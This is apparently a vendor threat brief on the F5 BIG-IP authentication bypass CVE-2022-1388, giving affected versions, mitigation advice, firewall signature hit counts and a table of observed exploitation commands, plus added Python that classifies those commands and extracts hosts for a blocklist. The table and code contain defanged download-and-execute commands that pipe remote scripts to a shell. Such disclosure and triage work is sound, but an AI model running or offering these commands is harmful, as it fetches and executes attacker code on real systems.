On May 4, 2022, F5 released a security advisory for a remote code execution vulnerability in the iControl REST component of its BIG-IP product, tracked as CVE-2022-1388. Threat actors can exploit this vulnerability to bypass authentication and run arbitrary code on unpatched systems. With a CVSS score of 9.8, this is a critical vulnerability that needs immediate attention. Since the release of the advisory, mass scanning activity seeking unpatched systems has started, and in-the-wild exploitation has begun.
Palo Alto Networks released a Threat Prevention signature for the F5 BIG-IP Authentication Bypass Vulnerability (92570) and within just 10 hours, the signature triggered 2,552 times due to vulnerability scanning and active exploitation attempts.
Unit 42 recommends customers upgrade to the latest release of F5 BIG-IP products. Palo Alto Networks Next Generation Firewall Threat Prevention customers are protected with Signature 92570.
The F5 product vulnerable to CVE-2022-1388 is BIG-IP with the following versions:
- 16.1.0 - 16.1.2
- 15.1.0 - 15.1.5
- 14.1.0 - 14.1.4
- 13.1.0 - 13.1.4
- 12.1.0 - 12.1.6
- 11.6.1 - 11.6.5
The vulnerability exists within the iControl REST framework used by BIG-IP.
We recommend that customers update their F5 BIG-IP deployments to one of the following versions that have patches to mitigate CVE-2022-1388:
Until you can install a patched version of BIG-IP, see the Mitigation section of the F5 security advisory for a workaround that restricts access to the vulnerable component to trusted networks.
In response to the F5 security advisory, Palo Alto Networks released the Threat Prevention signature F5 BIG-IP Authentication Bypass Vulnerability (92570) on May 9.
We observed this signature triggered 2,552 times between 4:47 and 14:00 UTC on May 10. We were able to analyze 2,151 packets that triggered the signature and observed both vulnerability scanning activity and active exploitation attempts.
Table 1 shows the commands that would be executed in the event of successful exploitation. These were found by analysis of the packet captures that triggered the F5 BIG-IP Authentication Bypass Vulnerability signature.
| Count | Command |
|---|---|
| 19 | `curl -o- -L hxxp://20.239.193[.]47/kele.sh\| sh > /dev/null 2>&1 &` |
| 11 | `find /usr/local/www -name *.php \| xargs grep eval` |
| 3 | `curl -fsLk hxxps://transfer[.]sh/dlxo3I/1.sh \| sh` |
| 1 | `wget hxxp://20.187.86[.]47/dadda;chmod 777 *;./dadda` |
| 1 | `curl -o- -L hxxp://20.239.193[.]47/kele1\|sh` |

Table 1. Commands observed in CVE-2022-1388 exploitation attempts.
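As an added example (not code from this post or from Palo Alto Networks), the Python below triages command strings like those in Table 1 from the defender's side: it labels each command by what it tries to do, refangs the defanged hosts into a deduplicated blocklist, and weights the labels by the observed counts. The five rows are constructed from Table 1 exactly as printed; the regular expressions and the labels `download_and_execute`, `recon` and `other` are this example's own assumptions, not categories from the post.

```python
import re

# Constructed sample: the rows of Table 1 as (count, command), kept in the
# defanged form (hxxp, [.]) that the post prints.
OBSERVED_COMMANDS = [
    (19, "curl -o- -L hxxp://20.239.193[.]47/kele.sh| sh > /dev/null 2>&1 &"),
    (11, "find /usr/local/www -name *.php | xargs grep eval"),
    (3, "curl -fsLk hxxps://transfer[.]sh/dlxo3I/1.sh | sh"),
    (1, "wget hxxp://20.187.86[.]47/dadda;chmod 777 *;./dadda"),
    (1, "curl -o- -L hxxp://20.239.193[.]47/kele1|sh"),
]

# Defanged URL: scheme hxxp/hxxps, host with "[.]" separators, optional path.
# The path stops at whitespace or a shell metacharacter so "| sh" is not swallowed.
DEFANGED_URL = re.compile(r"hxxps?://([A-Za-z0-9\[\].-]+)(/[^\s;|&\"']*)?")


def refang(host):
    """Turn '20.239.193[.]47' back into '20.239.193.47' for a blocklist."""
    return host.replace("[.]", ".")


def classify(cmd):
    """Label a post-exploitation command by behaviour (labels are assumptions).

    download_and_execute: curl/wget output is piped to a shell, or the
                          fetched file is chmod'ed and run
    recon:                the command only inspects the host
    other:                nothing matched
    """
    fetch = re.search(r"\b(curl|wget)\b", cmd) is not None
    piped_to_shell = re.search(r"\|\s*(ba)?sh\b", cmd) is not None
    runs_dropped_file = re.search(r"chmod\s+[0-7]{3,4}\b.*;\s*\./", cmd) is not None
    if fetch and (piped_to_shell or runs_dropped_file):
        return "download_and_execute"
    if re.search(r"\b(find|grep|ls|cat|id|whoami|uname)\b", cmd):
        return "recon"
    return "other"


def extract_iocs(cmd):
    """Return the refanged remote hosts a command reaches out to (may be empty)."""
    return sorted({refang(m.group(1)) for m in DEFANGED_URL.finditer(cmd)})


def triage(rows):
    """Summarise (count, command) rows: hits per label and a deduplicated host list."""
    counts = {}
    hosts = set()
    for count, cmd in rows:
        label = classify(cmd)
        counts[label] = counts.get(label, 0) + count
        hosts.update(extract_iocs(cmd))
    return {"counts": counts, "hosts": sorted(hosts)}


if __name__ == "__main__":
    for count, cmd in OBSERVED_COMMANDS:
        print(f"{count:>3} {classify(cmd):22} {extract_iocs(cmd)}  {cmd}")
    print(triage(OBSERVED_COMMANDS))
```

Run over Table 1, every curl/wget row lands in `download_and_execute` and only the `find ... grep eval` row is `recon`, so the weighted summary is 24 hits of download-and-execute against 11 of reconnaissance, and the host list is ready to feed an egress blocklist or a retrospective proxy-log search. The defanged form is kept in the sample on purpose: IoCs copied from a report are usually defanged, and refanging them in code avoids hand-editing mistakes.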
Palo Alto Networks customers receive protections against the exploitation of this vulnerability in the following ways:
- Next-Generation Firewalls with a Threat Prevention security subscription (running Applications and Threat content update version 8567) can automatically block sessions related to this vulnerability using the F5 BIG-IP Authentication Bypass Vulnerability signature (Threat ID 92570).
Palo Alto Networks will update this Threat Brief with new information and recommendations as they become available.
Updated May 16, 2022